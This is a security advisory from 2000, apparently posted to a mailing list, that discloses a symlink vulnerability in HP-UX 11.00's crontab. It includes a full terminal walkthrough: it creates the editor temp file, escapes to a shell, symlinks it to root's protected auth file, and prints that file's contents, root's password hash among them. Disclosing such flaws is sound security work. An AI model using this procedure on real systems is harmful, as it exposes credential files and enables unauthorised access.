Subject: [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability
From: Kyong-won Cho (dubhe@HACKERSLAB.COM)
Date: Fri Oct 20 2000 - 22:08:20 CDT
================================================================================
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability
================================================================================
File : /usr/bin/crontab
SYSTEM : HP-UX
Tested in HP-UX 11.00
INFO :
There is a vulnerability in "crontab" which allows users to read all files
without attaining root or file ownership privileges.
The "crontab" command can't be run by any user in general; however, users
that are registered in crontab.allow are permitted to run the command.
Using the crontab command with the -e option (crontab -e) executes the vi
editor, and a temporary file is created in /var/tmp/. The owner of the file
is the current user.
Make a subshell by using the !sh command in vi and link the file created in
/var/tmp/, then exit crontab. Then the error message appears with all the
file names and details.
Example) display the contents of /tcb/files/auth/r/root
$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00
$ crontab -e
...
...
~
"/var/tmp/aaaa25923"
### A file named /var/tmp/aaaa25923 is created
~
:!sh
### Make a subshell
$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
$ exit
### Make symlink and return to vi
[Hit return to continue]
:q!
### Quit vi
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock
:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
==-------------------------------------------------------------------------------==
dubhe@hackerslab.org [Kyong-won, Cho]
[ http://www.hackerslab.org ]
HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==